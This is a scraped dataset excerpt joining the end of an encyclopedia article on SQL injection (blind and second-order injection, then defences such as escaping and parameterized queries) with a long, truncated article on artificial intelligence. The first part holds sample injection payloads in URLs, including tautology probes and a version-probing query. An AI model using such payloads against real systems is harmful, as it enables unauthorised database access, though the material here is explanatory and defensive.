location of the vulnerability and the target information has been established. 11 One type of blind SQL injection forces the database to evaluate a logical statement on an ordinary application screen. As an example, a book review website uses a query string to determine which book review to display. So the URL https: books.example.com review?id 5 would cause the server to run the query from which it would populate the review page with data from the review with ID 5, stored in the table bookreviews. The query happens completely on the server; the user does not know the names of the database, table, or fields, nor does the user know the query string. The user only sees that the above URL returns a book review. A hacker can load the URLs https: books.example.com review?id 5' OR '1' '1 and https: books.example.com review?id 5' AND '1' '2, which may result in queries respectively. If the original review loads with the "1 1" URL and a blank or error page is returned from the "1 2" URL, and the returned page has not been created to alert the user the input is invalid, or in other words, has been caught by an input test script, the site is likely vulnerable to an SQL injection attack as the query will likely have passed through successfully in both cases. The hacker may proceed with this query string designed to reveal the version number of MySQL running on the server: https: books.example.com review?id 5 AND substring( version, 1, INSTR( version, . ) - 1) 4, which would show the book review on a server running MySQL 4 and a blank or error page otherwise. The hacker can continue to use code within query strings to achieve their goal directly, or to glean more information from the server in hopes of discovering another avenue of attack. 12 13 Second-order SQL injection occurs when submitted values contain malicious commands that are stored rather than executed immediately. In some cases, the application may correctly encode a SQL statement and store it as valid SQL. Then, another part of that application without controls to protect against SQL injection might execute that stored SQL statement. This attack requires more knowledge of how submitted values are later used. Automated web application security scanners would not easily detect this type of SQL injection and may need to be manually instructed where to check for evidence that it is being attempted. An SQL injection is a well known attack and easily prevented by simple measures. After an apparent SQL injection attack on TalkTalk in 2015, the BBC reported that security experts were stunned that such a large company would be vulnerable to it. 14 Techniques like pattern matching, software testing, and grammar analysis are some common ways to mitigate these attacks. 2 The simplest way to prevent injections is to escape all characters that have a special meaning in SQL. The manual for an SQL DBMS explains which characters have a special meaning, which allows creating a comprehensive blacklist of characters that need translation. For instance, every occurrence of a single quote ( ) in a string parameter must be prepended with a backslash ( ) so that the database understands the single quote is part of a given string, rather than its terminator. PHP provides the mysqli real escape string() function to escape strings according to MySQL semantics; the following example parameterizes a SQL query by escaping username and password parameters: Depending solely on the programmer to diligently escape all query parameters presents inherent risks, given the potential for oversights in the process. To mitigate this vulnerability, programmers may opt to develop their own abstraction layers to automate the escaping of parameters. 15 Object relational mapping (ORM) frameworks such as Hibernate and ActiveRecord provide an object-oriented interface for queries over a relational database. Most, if not all, ORMs, automatically handle the escaping needed to prevent SQL injection attacks, as a part of the framework's query API. However, many ORMs provide the ability to bypass their mapping facilities and emit raw SQL statements; improper use of this functionality can introduce the possibility for an injection attack. 16 With most development platforms, parameterized statements that work with parameters can be used (sometimes called placeholders or bind variables) instead of embedding user input in the statement. A placeholder can only store a value of the given type and not an arbitrary SQL fragment. Hence the SQL injection would simply be treated as a strange (and probably invalid) parameter value. In many cases, the SQL statement is fixed, and each parameter is a scalar, not a table. The user input is then assigned (bound) to a parameter. 17 Integer, float, or Boolean string parameters can be checked to determine if their value is a valid representation of the given type. Strings that must adhere to a specific pattern or condition (e.g. dates, UUIDs, phone numbers) can also be checked to determine if said pattern is matched. Limiting the permissions on the database login used by the web application to only what is needed may help reduce the effectiveness of any SQL injection attacks that exploit any bugs in the web application. For example, on Microsoft SQL Server, a database logon could be restricted from selecting on some of the system tables which would limit exploits that try to insert JavaScript into all the text columns in the database. |
594 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Artificial_intelligence | Artificial intelligence (AI), in its broadest sense, is intelligence exhibited by machines, particularly computer systems. It is a field of research in computer science that develops and studies methods and software that enable machines to perceive their environment and use learning and intelligence to take actions that maximize their chances of achieving defined goals. 1 Such machines may be called AIs. Some high-profile applications of AI include advanced web search engines (e.g., Google Search); recommendation systems (used by YouTube, Amazon, and Netflix); interacting via human speech (e.g., Google Assistant, Siri, and Alexa); autonomous vehicles (e.g., Waymo); generative and creative tools (e.g., ChatGPT, Apple Intelligence, and AI art); and superhuman play and analysis in strategy games (e.g., chess and Go). However, many AI applications are not perceived as AI: "A lot of cutting edge AI has filtered into general applications, often without being called AI because once something becomes useful enough and common enough it's not labeled AI anymore. 2 3 Alan Turing was the first person to conduct substantial research in the field that he called "machine intelligence". 4 Artificial intelligence was founded as an academic discipline in 1956, 5 by those now considered the founding fathers of AI: John McCarthy, Marvin Minksy, Nathaniel Rochester, and Claude Shannon. 6 7 The field went through multiple cycles of optimism, 8 9 followed by periods of disappointment and loss of funding, known as AI winter. 10 11 Funding and interest vastly increased after 2012 when deep learning surpassed all previous AI techniques, 12 and after 2017 with the transformer architecture. 13 This led to the AI boom of the early 2020s, with companies, universities, and laboratories overwhelmingly based in the United States pioneering significant advances in artificial intelligence. 14 The growing use of artificial intelligence in the 21st century is influencing a societal and economic shift towards increased automation, data-driven decision-making, and the integration of AI systems into various economic sectors and areas of life, impacting job markets, healthcare, government, industry, education, propaganda, and disinformation. This raises questions about the long-term effects, ethical implications, and risks of AI, prompting discussions about regulatory policies to ensure the safety and benefits of the technology. The various subfields of AI research are centered around particular goals and the use of particular tools. The traditional goals of AI research include reasoning, knowledge representation, planning, learning, natural language processing, perception, and support for robotics. a General intelligence—the ability to complete any task performable by a human on an at least equal level—is among the field's long-term goals. 15 To reach these goals, AI researchers have adapted and integrated a wide range of techniques, including search and mathematical optimization, formal logic, artificial neural networks, and methods based on statistics, operations research, and economics. b AI also draws upon psychology, linguistics, philosophy, neuroscience, and other fields. 16 The general problem of simulating (or creating) intelligence has been broken into subproblems. These consist of particular traits or capabilities that researchers expect an intelligent system to display. The traits described below have received the most attention and cover the scope of AI research. a Early researchers developed algorithms that imitated step-by-step reasoning that humans use when they solve puzzles or make logical deductions. 17 By the late 1980s and 1990s, methods were developed for dealing with uncertain or incomplete information, employing concepts from probability and economics. 18 Many of these algorithms are insufficient for solving large reasoning problems because they experience a "combinatorial explosion": They become exponentially slower as the problems grow. 19 Even humans rarely use the step-by-step deduction that early AI research could model. They solve most of their problems using fast, intuitive judgments. 20 Accurate and efficient reasoning is an unsolved problem. Knowledge representation and knowledge engineering 21 allow AI programs to answer questions intelligently and make deductions about real-world facts. Formal knowledge representations are used in content-based indexing and retrieval, 22 scene interpretation, 23 clinical decision support, 24 knowledge discovery (mining "interesting" and actionable inferences from large databases), 25 and other areas. 26 A knowledge base is a body of knowledge represented in a form that can be used by a program. An ontology is the set of objects, relations, concepts, and properties used by a particular domain of knowledge. 27 Knowledge bases need to represent things such as objects, properties, categories, and relations between objects; 28 situations, events, states, and time; 29 causes and effects; 30 knowledge about knowledge (what we know about what other people know); 31 default reasoning (things that humans assume are true until they are told differently and will remain true even when other facts are changing); 32 and many other aspects and domains of knowledge. Among the most difficult problems in knowledge representation are the breadth of commonsense knowledge (the set of atomic facts that the average person knows is enormous); 33 and the sub-symbolic form of most commonsense knowledge (much of what people know is not represented as "facts" or "statements" that they could express verbally). 20 There is also the difficulty of knowledge acquisition, the problem of obtaining knowledge for AI applications. c An "agent" is anything that perceives and takes actions in the world. A rational agent has goals or preferences and takes actions to make them happen. d 36 In automated planning, the agent has a specific goal. 37 In automated decision-making, the agent has preferences—there are some situations it would prefer to be in, and some situations it is trying to avoid. The decision-making agent assigns a number to each situation (called the "utility") that measures how much the agent prefers it. For each possible action, it can calculate the "expected utility": the utility of all possible outcomes of the action, weighted by the probability that the outcome will occur. It can then choose the action with the maximum expected utility. 38 In classical planning, the agent knows exactly what the effect of any action will be. 39 In most real-world problems, however, the agent may not be certain about the situation they are in (it is "unknown" or "unobservable") and it may not know for certain what will happen after each possible action (it is not "deterministic"). It must choose an action by making a probabilistic guess and then reassess the situation to see if the action worked. 40 In some problems, the agent's preferences may be uncertain, especially if there are other agents or humans involved. These can be learned (e.g., with inverse reinforcement learning), or the agent can seek information to improve its preferences. 41 Information value theory can be used to weigh the value of exploratory or experimental actions. 42 The space of possible future actions and situations is typically intractably large, so the agents must take actions and evaluate situations while being uncertain of what the outcome will be. A Markov decision process has a transition model that describes the probability that a particular action will change the state in a particular way and a reward function that supplies the utility of each state and the cost of each action. A policy associates a decision with each possible state. The policy could be calculated (e.g., by iteration), be heuristic, or it can be learned. 43 Game theory describes the rational behavior of multiple interacting agents and is used in AI programs that make decisions that involve other agents. 44 Machine learning is the study of programs that can improve their performance on a given task automatically. 45 It has been a part of AI from the beginning. e There are several kinds of machine learning. Unsupervised learning analyzes a stream of data and finds patterns and makes predictions without any other guidance. 48 Supervised learning requires a human to label the input data first, and comes in two main varieties: classification (where the program must learn to predict what category the input belongs in) and regression (where the program must deduce a numeric function based on numeric input). 49 In reinforcement learning, the agent is rewarded for good responses and punished for bad ones. The agent learns to choose responses that are classified as "good". 50 Transfer learning is when the knowledge gained from one problem is applied to a new problem. 51 Deep learning is a type of machine learning that runs inputs through biologically inspired artificial neural networks for all of these types of learning. 52 Computational learning theory can assess learners by computational complexity, by sample complexity (how much data is required), or by other notions of optimization. 53 Natural language processing (NLP) 54 allows programs to read, write and communicate in human languages such as English. Specific problems include speech recognition, speech synthesis, machine translation, information extraction, information retrieval and question answering. 55 Early work, based on Noam Chomsky's generative grammar and semantic networks, had difficulty with word-sense disambiguation f unless restricted to small domains called "micro-worlds" (due to the common sense knowledge problem 33 ). Margaret Masterman believed that it was meaning and not grammar that was the key to understanding languages, and that thesauri and not dictionaries should be the basis of computational language structure. Modern deep learning techniques for NLP include word embedding (representing words, typically as vectors encoding their meaning), 56 transformers (a deep learning architecture using an attention mechanism), 57 and others. 58 In 2019, generative pre-trained transformer (or "GPT") language models began to generate coherent text, 59 60 and by 2023, these models were able to get human-level scores on the bar exam, SAT test, GRE test, and many other real-world applications. 61 Machine perception is the ability to use input from sensors (such as cameras, microphones, wireless signals, active lidar, sonar, radar, and tactile sensors) to deduce aspects of the world. Computer vision is the ability to analyze visual input. 62 The field includes speech recognition, 63 image classification, 64 facial recognition, object recognition, 65 object tracking, 66 and robotic perception. 67 Affective computing is an interdisciplinary umbrella that comprises systems that recognize, interpret, process, or simulate human feeling, emotion, and mood. 69 For example, some virtual assistants are programmed to speak conversationally or even to banter humorously; it makes them appear more sensitive to the emotional dynamics of human interaction, or to otherwise facilitate human computer interaction. However, this tends to give na ve users an unrealistic conception of the intelligence of existing computer agents. 70 Moderate successes related to affective computing include textual sentiment analysis and, more recently, multimodal sentiment analysis, wherein AI classifies the affects displayed by a videotaped subject. 71 A machine with artificial general intelligence should be able to solve a wide variety of problems with breadth and versatility similar to human intelligence. 15 AI research uses a wide variety of techniques to accomplish the goals above. b AI can solve many problems by intelligently searching through many possible solutions. 72 There are two very different kinds of search used in AI: state space search and local search. State space search searches through a tree of possible states to try to find a goal state. 73 For example, planning algorithms search through trees of goals and subgoals, attempting to find a path to a target goal, a process called means-ends analysis. 74 Simple exhaustive searches 75 are rarely sufficient for most real-world problems: the search space (the number of places to search) quickly grows to astronomical numbers. The result is a search that is too slow or never completes. 19 "Heuristics" or "rules of thumb" can help prioritize choices that are more likely to reach a goal. 76 Adversarial search is used for game-playing programs, such as chess or Go. It searches through a tree of possible moves and counter-moves, looking for a winning position. 77 Local search uses mathematical optimization to find a solution to a problem. It begins with some form of guess and refines it incrementally. 78 Gradient descent is a type of local search that optimizes a set of numerical parameters by incrementally adjusting them to minimize a loss function. Variants of gradient descent are commonly used to train neural networks. 79 Another type of local search is evolutionary computation, which aims to iteratively improve a set of candidate solutions by "mutating" and "recombining" them, selecting only the fittest to survive each generation. 80 Distributed search processes can coordinate via swarm intelligence algorithms. Two popular swarm algorithms used in search are particle swarm optimization (inspired by bird flocking) and ant colony optimization (inspired by ant trails). 81 Formal logic is used for reasoning and knowledge representation. 82 Formal logic comes in two main forms: propositional logic (which operates on statements that are true or false and uses logical connectives such as "and", "or", "not" and "implies") 83 and predicate logic (which also operates on objects, predicates and relations and uses quantifiers such as "Every X is a Y" and "There are some Xs that are Ys"). 84 Deductive reasoning in logic is the process of proving a new statement (conclusion) from other statements that are given and assumed to be true (the premises). 85 Proofs can be structured as proof trees, in which nodes are labelled by sentences, and children nodes are connected to parent nodes by inference rules. Given a problem and a set of premises, problem-solving reduces to searching for a proof tree whose root node is labelled by a solution of the problem and whose leaf nodes are labelled by premises or axioms. In the case of Horn clauses, problem-solving search can be performed by reasoning forwards from the premises or backwards from the problem. 86 In the more general case of the clausal form of first-order logic, resolution is a single, axiom-free rule of inference, in which a problem is solved by proving a contradiction from premises that include the negation of the problem to be solved. 87 Inference in both Horn clause logic and first-order logic is undecidable, and therefore intractable. However, backward reasoning with Horn clauses, which underpins computation in the logic programming language Prolog, is Turing complete. Moreover, its efficiency is competitive with computation in other symbolic programming languages. 88 Fuzzy logic assigns a "degree of truth" between 0 and 1. It can therefore handle propositions that are vague and partially true. 89 Non-monotonic logics, including logic programming with negation as failure, are designed to handle default reasoning. 32 Other specialized versions of logic have been developed to describe many complex domains. Many problems in AI (including in reasoning, planning, learning, perception, and robotics) require the agent to operate with incomplete or uncertain information. AI researchers have devised a number of tools to solve these problems using methods from probability theory and economics. 90 Precise mathematical tools have been developed that analyze how an agent can make choices and plan, using decision theory, decision analysis, 91 and information value theory. 92 These tools include models such as Markov decision processes, 93 dynamic decision networks, 94 game theory and mechanism design. 95 Bayesian networks 96 are a tool that can be used for reasoning (using the Bayesian inference algorithm), g 98 learning (using the expectation maximization algorithm), h 100 planning (using decision networks) 101 and perception (using dynamic Bayesian networks). 94 Probabilistic algorithms can also be used for filtering, prediction, smoothing, and finding explanations for streams of data, thus helping perception systems analyze processes that occur over time (e.g., hidden Markov models or Kalman filters). 94 The simplest AI applications can be divided into two types: classifiers (e.g., "if shiny then diamond"), on one hand, and controllers (e.g., "if diamond then pick up"), on the other hand. Classifiers 102 are functions that use pattern matching to determine the closest match. They can be fine-tuned based on chosen examples using supervised learning. Each pattern (also called an "observation") is labeled with a certain predefined class. All the observations combined with their class labels are known as a data set. When a new observation is received, that observation is classified based on previous experience. 49 There are many kinds of classifiers in use. 103 The decision tree is the simplest and most widely used symbolic machine learning algorithm. 104 K-nearest neighbor algorithm was the most widely used analogical AI until the mid 1990s, and Kernel methods such as the support vector machine (SVM) displaced k-nearest neighbor in the 1990s. 105 The naive Bayes classifier is reportedly the "most widely used learner" 106 at Google, due in part to its scalability. 107 Neural networks are also used as classifiers. 108 An artificial neural network is based on a collection of nodes also known as artificial neurons, which loosely model the neurons in a biological brain. It is trained to recognise patterns; once trained, it can recognise those patterns in fresh data. There is an input, at least one hidden layer of nodes and an output. Each node applies a function and once the weight crosses its specified threshold, the data is transmitted to the next layer. A network is typically called a deep neural network if it has at least 2 hidden layers. 108 Learning algorithms for neural networks use local search to choose the weights that will get the right output for each input during training. The most common training technique is the backpropagation algorithm. 109 Neural networks learn to model complex relationships between inputs and outputs and find patterns in data. In theory, a neural network can learn any function. 110 In feedforward neural networks the signal passes in only one direction. 111 Recurrent neural networks feed the output signal back into the input, which allows short-term memories of previous input events. Long short term memory is the most successful network architecture for recurrent networks. 112 Perceptrons 113 use only a single layer of neurons, deep learning 114 uses multiple layers. Convolutional neural networks strengthen the connection between neurons that are "close" to each other—this is especially important in image processing, where a local set of neurons must identify an "edge" before the network can identify an object. 115 Deep learning 114 uses several layers of neurons between the network's inputs and outputs. The multiple layers can progressively extract higher-level features from the raw input. For example, in image processing, lower layers may identify edges, while higher layers may identify the concepts relevant to a human such as digits, letters, or faces. 116 Deep learning has profoundly improved the performance of programs in many important subfields of artificial intelligence, including computer vision, speech recognition, natural language processing, image classification, 117 and others. The reason that deep learning performs so well in so many applications is not known as of 2023. 118 The sudden success of deep learning in 2012 2015 did not occur because of some new discovery or theoretical breakthrough (deep neural networks and backpropagation had been described by many people, as far back as the 1950s) i but because of two factors: the incredible increase in computer power (including the hundred-fold increase in speed by switching to GPUs) and the availability of vast amounts of training data, especially the giant curated datasets used for benchmark testing, such as ImageNet. j Generative pre-trained transformers (GPT) are large language models (LLMs) that generate text based on the semantic relationships between words in sentences. Text-based GPT models are pretrained on a large corpus of text that can be from the Internet. The pretraining consists of predicting the next token (a token being usually a word, subword, or punctuation). Throughout this pretraining, GPT models accumulate knowledge about the world and can then generate human-like text by repeatedly predicting the next token. Typically, a subsequent training phase makes the model more truthful, useful, and harmless, usually with a technique called reinforcement learning from human feedback (RLHF). Current GPT models are prone to generating falsehoods called "hallucinations", although this can be reduced with RLHF and quality data. They are used in chatbots, which allow people to ask a question or request a task in simple text. 126 127 Current models and services include Gemini (formerly Bard), ChatGPT, Grok, Claude, Copilot, and LLaMA. 128 Multimodal GPT models can process different types of data (modalities) such as images, videos, sound, and text. 129 In the late 2010s, graphics processing units (GPUs) that were increasingly designed with AI-specific enhancements and used with specialized TensorFlow software had replaced previously used central processing unit (CPUs) as the dominant means for large-scale (commercial and academic) machine learning models' training. 130 Specialized programming languages such as Prolog were used in early AI research, 131 but general-purpose programming languages like Python have become predominant. 132 AI and machine learning technology is used in most of the essential applications of the 2020s, including: search engines (such as Google Search), targeting online advertisements, recommendation systems (offered by Netflix, YouTube or Amazon), driving internet traffic, targeted advertising (AdSense, Facebook), virtual assistants (such as Siri or Alexa), autonomous vehicles (including drones, ADAS and self-driving cars), automatic language translation (Microsoft Translator, Google Translate), facial recognition (Apple's Face ID or Microsoft's DeepFace and Google's FaceNet) and image labeling (used by Facebook, Apple's iPhoto and TikTok). The deployment of AI may be overseen by a Chief automation officer (CAO). The application of AI in medicine and medical research has the potential to increase patient care and quality of life. 133 Through the lens of the Hippocratic Oath, medical professionals are ethically compelled to use AI, if applications can more accurately diagnose and treat patients. For medical research, AI is an important tool for processing and integrating big data. This is particularly important for organoid and tissue engineering development which use microscopy imaging as a key technique in fabrication. 134 It has been suggested that AI can overcome discrepancies in funding allocated to different fields of research. 134 New AI tools can deepen the understanding of biomedically relevant pathways. For example, AlphaFold 2 (2021) demonstrated the ability to approximate, in hours rather than months, the 3D structure of a protein. 135 In 2023, it was reported that AI-guided drug discovery helped find a class of antibiotics capable of killing two different types of drug-resistant bacteria. 136 In 2024, researchers used machine learning to accelerate the search for Parkinson's disease drug treatments. Their aim was to identify compounds that block the clumping, or aggregation, of alpha-synuclein (the protein that characterises Parkinson's disease). They were able to speed up the initial screening process ten-fold and reduce the cost by a thousand-fold. 137 138 Game playing programs have been used since the 1950s to demonstrate and test AI's most advanced techniques. 139 Deep Blue became the first computer chess-playing system to beat a reigning world chess champion, Garry Kasparov, on 11 May 1997. 140 In 2011, in a Jeopardy quiz show exhibition match, IBM's question answering system, Watson, defeated the two greatest Jeopardy champions, Brad Rutter and Ken Jennings, by a significant margin. 141 In March 2016, AlphaGo won 4 out of 5 games of Go in a match with Go champion Lee Sedol, becoming the first computer Go-playing system to beat a professional Go player without handicaps. Then in 2017 it defeated Ke Jie, who was the best Go player in the world. 142 Other programs handle imperfect-information games, such as the poker-playing program Pluribus. 143 DeepMind developed increasingly generalistic reinforcement learning models, such as with MuZero, which could be trained to play chess, Go, or Atari games. 144 In 2019, DeepMind's AlphaStar achieved grandmaster level in StarCraft II, a particularly challenging real-time strategy game that involves incomplete knowledge of what happens on the map. 145 In 2021, an AI agent competed in a PlayStation Gran Turismo competition, winning against four of the world's best Gran Turismo drivers using deep reinforcement learning. 146 In 2024, Google DeepMind introduced SIMA, a type of AI capable of autonomously playing nine previously unseen open-world video games by observing screen output, as well as executing short, specific tasks in response to natural language instructions. 147 In mathematics, special forms of formal step-by-step reasoning are used. In contrast, LLMs such as GPT 4 Turbo, Gemini Ultra, Claude Opus, LLaMa 2 or Mistral Large are working with probabilistic models, which can produce wrong answers in the form of hallucinations. Therefore, they need not only a large database of mathematical problems to learn from but also methods such as supervised fine-tuning or trained classifiers with human-annotated data to improve answers for new problems and learn from corrections. 148 A 2024 study showed that the performance of some language models for reasoning capabilities in solving math problems not included in their training data was low, even for problems with only minor deviations from trained data. 149 Alternatively, dedicated models for mathematic problem solving with higher precision for the outcome including proof of theorems have been developed such as Alpha Tensor, Alpha Geometry and Alpha Proof all from Google DeepMind, 150 Llemma from eleuther 151 or Julius. 152 When natural language is used to describe mathematical problems, converters transform such prompts into a formal language such as Lean to define mathematic tasks. Some models have been developed to solve challenging problems and reach good results in benchmark tests, others to serve as educational tools in mathematics. 153 Finance is one of the fastest growing sectors where applied AI tools are being deployed: from retail online banking to investment advice and insurance, where automated "robot advisers" have been in use for some years. 154 World Pensions experts like Nicolas Firzli insist it may be too early to see the emergence of highly innovative AI-informed financial products and services: "the deployment of AI tools will simply further automatise things: destroying tens of thousands of jobs in banking, financial planning, and pension advice in the process, but I’m not sure it will unleash a new wave of e.g., sophisticated pension innovation. 155 Various countries are deploying AI military applications. 156 The main applications enhance command and control, communications, sensors, integration and interoperability. 157 Research is targeting intelligence collection and analysis, logistics, cyber operations, information operations, and semiautonomous and autonomous vehicles. 156 AI technologies enable coordination of sensors and effectors, threat detection and identification, marking of enemy positions, target acquisition, coordination and deconfliction of distributed Joint Fires between networked combat vehicles involving manned and unmanned teams. 157 AI was incorporated into military operations in Iraq and Syria. 156 In November 2023, US Vice President Kamala Harris disclosed a declaration signed by 31 nations to set guardrails for the military use of AI. The commitments include using legal reviews to ensure the compliance of military AI with international laws, and being cautious and transparent in the development of this technology. 158 In the early 2020s, generative AI gained widespread prominence. In March 2023, 58% of U.S. adults had heard about ChatGPT and 14% had tried it. 159 The increasing realism and ease-of-use of AI-based text-to-image generators such as Midjourney, DALL-E, and Stable Diffusion sparked a trend of viral AI-generated photos. Widespread attention was gained by a fake photo of Pope Francis wearing a white puffer coat, the fictional arrest of Donald Trump, and a hoax of an attack on the Pentagon, as well as the usage in professional creative arts. 160 161 Artificial intelligent (AI) agents are software entities designed to perceive their environment, make decisions, and take actions autonomously to achieve specific goals. These agents can interact with users, their environment, or other agents. AI agents are used in various applications, including virtual assistants, chatbots, autonomous vehicles, game-playing systems, and industrial robotics. AI agents operate within the constraints of their programming, available computational resources, and hardware limitations. This means they are restricted to performing tasks within their defined scope and have finite memory and processing capabilities. In real-world applications, AI agents often face time constraints for decision-making and action execution. Many AI agents incorporate learning algorithms, enabling them to improve their performance over time through experience or training. Using machine learning, AI agents can adapt to new situations and optimise their behaviour for their designated tasks. 162 163 164 There are also thousands of successful AI applications used to solve specific problems for specific industries or institutions. In a 2017 survey, one in five companies reported having incorporated "AI" in some offerings or processes. 165 A few examples are energy storage, medical diagnosis, military logistics, applications that predict the result of judicial decisions, foreign policy, or supply chain management. AI applications for evacuation and disaster management are growing. AI has been used to investigate if and how people evacuated in large scale and small scale evacuations using historical data from GPS, videos or social media. Further, AI can provide real time information on the real time evacuation conditions. 166 167 168 In agriculture, AI has helped farmers identify areas that need irrigation, fertilization, pesticide treatments or increasing yield. Agronomists use AI to conduct research and development. AI has been used to predict the ripening time for crops such as tomatoes, monitor soil moisture, operate agricultural robots, conduct predictive analytics, classify livestock pig call emotions, automate greenhouses, detect diseases and pests, and save water. Artificial intelligence is used in astronomy to analyze increasing amounts of available data and applications, mainly for "classification, regression, clustering, forecasting, generation, discovery, and the development of new scientific insights" for example for discovering exoplanets, forecasting solar activity, and distinguishing between signals and instrumental effects in gravitational wave astronomy. It could also be used for activities in space such as space exploration, including analysis of data from space missions, real-time science decisions of spacecraft, space debris avoidance, and more autonomous operation. AI has potential benefits and potential risks. AI may be able to advance science and find solutions for serious problems: Demis Hassabis of Deep Mind hopes to "solve intelligence, and then use that to solve everything else". 169 However, as the use of AI has become widespread, several unintended consequences and risks have been identified. 170 In-production systems can sometimes not factor ethics and bias into their AI training processes, especially when the AI algorithms are inherently unexplainable in deep learning. 171 Machine learning algorithms require large amounts of data. The techniques used to acquire this data have raised concerns about privacy, surveillance and copyright. AI-powered devices and services, such as virtual assistants and IoT products, continuously collect personal information, raising concerns about intrusive data gathering and unauthorized access by third parties. The loss of privacy is further exacerbated by AI's ability to process and combine vast amounts of data, potentially leading to a surveillance society where individual activities are constantly monitored and analyzed without adequate safeguards or transparency. Sensitive user data collected may include online activity records, geolocation data, video or audio. 172 For example, in order to build speech recognition algorithms, Amazon has recorded millions of private conversations and allowed temporary workers to listen to and transcribe some of them. 173 Opinions about this widespread surveillance range from those who see it as a necessary evil to those for whom it is clearly unethical and a violation of the right to privacy. 174 AI developers argue that this is the only way to deliver valuable applications. and have developed several techniques that attempt to preserve privacy while still obtaining the data, such as data aggregation, de-identification and differential privacy. 175 Since 2016, some privacy experts, such as Cynthia Dwork, have begun to view privacy in terms of fairness. Brian Christian wrote that experts have pivoted "from the question of 'what they know' to the question of 'what they're doing with it'. 176 Generative AI is often trained on unlicensed copyrighted works, including in domains such as images or computer code; the output is then used under the rationale of "fair use". Experts disagree about how well and under what circumstances this rationale will hold up in courts of law; relevant factors may include "the purpose and character of the use of the copyrighted work" and "the effect upon the potential market for the copyrighted work". 177 178 Website owners who do not wish to have their content scraped can indicate it in a "robots.txt" file. 179 In 2023, leading authors (including John Grisham and Jonathan Franzen) sued AI companies for using their work to train generative AI. 180 181 Another discussed approach is to envision a separate sui generis system of protection for creations generated by AI to ensure fair attribution and compensation for human authors. 182 The commercial AI scene is dominated by Big Tech companies such as Alphabet Inc., Amazon, Apple Inc., Meta Platforms, and Microsoft. 183 184 185 Some of these players already own the vast majority of existing cloud infrastructure and computing power from data centers, allowing them to entrench further in the marketplace. 186 187 In January 2024, the International Energy Agency (IEA) released Electricity 2024, Analysis and Forecast to 2026, forecasting electric power use. 188 This is the first IEA report to make projections for data centers and power consumption for artificial intelligence and cryptocurrency. The report states that power demand for these uses might double by 2026, with additional electric power usage equal to electricity used by the whole Japanese nation. 189 Prodigious power consumption by AI is responsible for the growth of fossil fuels use, and might delay closings of obsolete, carbon-emitting coal energy facilities. There is a feverish rise in the construction of data centers throughout the US, making large technology firms (e.g., Microsoft, Meta, Google, Amazon) into voracious consumers of electric power. Projected electric consumption is so immense that there is concern that it will be fulfilled no matter the source. A ChatGPT search involves the use of 10 times the electrical energy as a Google search. The large firms are in haste to find power sources from nuclear energy to geothermal to fusion. The tech firms argue that in the long view AI will be eventually kinder to the environment, but they need the energy now. AI makes the power grid more efficient and "intelligent", will assist in the growth of nuclear power, and track overall carbon emissions, according to technology firms. 190 A 2024 Goldman Sachs Research Paper, AI Data Centers and the Coming US Power Demand Surge, found "US power demand (is) likely to experience growth not seen in a generation…. and forecasts that, by 2030, US data centers will consume 8% of US power, as opposed to 3% in 2022, presaging growth for the electrical power generation industry by a variety of means. 191 Data centers' need for more and more electrical power is such that they might max out the electrical grid. The Big Tech companies counter that AI can be used to maximize the utilization of the grid by all. 192 In 2024, the Wall Street Journal reported that big AI companies have begun negotiations with the US nuclear power providers to provide electricity to the data centers. In March 2024 Amazon purchased a Pennsylvania nuclear-powered data center for $650 Million (US). 193 YouTube, Facebook and others use recommender systems to guide users to more content. These AI programs were given the goal of maximizing user engagement (that is, the only goal was to keep people watching). The AI learned that users tended to choose misinformation, conspiracy theories, and extreme partisan content, and, to keep them watching, the AI recommended more of it. Users also tended to watch more content on the same subject, so the AI led people into filter bubbles where they received multiple versions of the same misinformation. 194 This convinced many users that the misinformation was true, and ultimately undermined trust in institutions, the media and the government. 195 The AI program had correctly learned to maximize its goal, but the result was harmful to society. After the U.S. election in 2016, major technology companies took steps to mitigate the problem citation needed . In 2022, generative AI began to create images, audio, video and text that are indistinguishable from real photographs, recordings, films, or human writing. It is possible for bad actors to use this technology to create massive amounts of misinformation or propaganda. 196 AI pioneer Geoffrey Hinton expressed concern about AI enabling "authoritarian leaders to manipulate their electorates" on a large scale, among other risks. 197 In statistics, a bias is a systematic error or deviation from the correct value. But in the context of fairness, it often refers to a tendency in favor or against a certain group or individual characteristic, usually in a way that is considered unfair or harmful. A statistically unbiased AI system that produces disparate outcomes for different demographic groups may thus be viewed as biased in the ethical sense. 198 The field of fairness studies how to prevent harms from algorithmic biases. There are various conflicting definitions and mathematical models of fairness. These notions depend on ethical assumptions, and are influenced by beliefs about society. One broad category is distributive fairness, which focuses on the outcomes, often identifying groups and seeking to compensate for statistical disparities. Representational fairness tries to ensure that AI systems don't reinforce negative stereotypes or render certain groups invisible. Procedural fairness focuses on the decision process rather than the outcome. The most relevant notions of fairness may depend on the context, notably the type of AI application and the stakeholders. The subjectivity in the notions of bias and fairness makes it difficult for companies to operationalize them. Having access to sensitive attributes such as race or gender is also considered by many AI ethicists to be necessary in order to compensate for biases, but it may conflict with anti-discrimination laws. 198 Machine learning applications will be biased if they learn from biased data. 199 The developers may not be aware that the bias exists. 200 Bias can be introduced by the way training data is selected and by the way a model is deployed. 201 199 If a biased algorithm is used to make decisions that can seriously harm people (as it can in medicine, finance, recruitment, housing or policing) then the algorithm may cause discrimination. 202 On June 28, 2015, Google Photos's new image labeling feature mistakenly identified Jacky Alcine and a friend as "gorillas" because they were black. The system was trained on a dataset that contained very few images of black people, 203 a problem called "sample size disparity". 204 Google "fixed" this problem by preventing the system from labelling anything as a "gorilla". Eight years later, in 2023, Google Photos still could not identify a gorilla, and neither could similar products from Apple, Facebook, Microsoft and Amazon. 205 COMPAS is a commercial program widely used by U.S. courts to assess the likelihood of a defendant becoming a recidivist. In 2016, Julia Angwin at ProPublica discovered that COMPAS exhibited racial bias, despite the fact that the program was not told the races of the defendants. Although the error rate for both whites and blacks was calibrated equal at exactly 61%, the errors for each race were different—the system consistently overestimated the chance that a black person would re-offend and would underestimate the chance that a white person would not re-offend. 206 In 2017, several researchers k showed that it was mathematically impossible for COMPAS to accommodate all possible measures of fairness when the base rates of re-offense were different for whites and blacks in the data. 208 A program can make biased decisions even if the data does not explicitly mention a problematic feature (such as "race" or "gender"). The feature will correlate with other features (like "address", "shopping history" or "first name"), and the program will make the same decisions based on these features as it would on "race" or "gender". 209 Moritz Hardt said "the most robust fact in this research area is that fairness through blindness doesn't work. 210 Criticism of COMPAS highlighted that machine learning models are designed to make "predictions" that are only valid if we assume that the future will resemble the past. If they are trained on data that includes the results of racist decisions in the past, machine learning models must predict that racist decisions will be made in the future. If an application 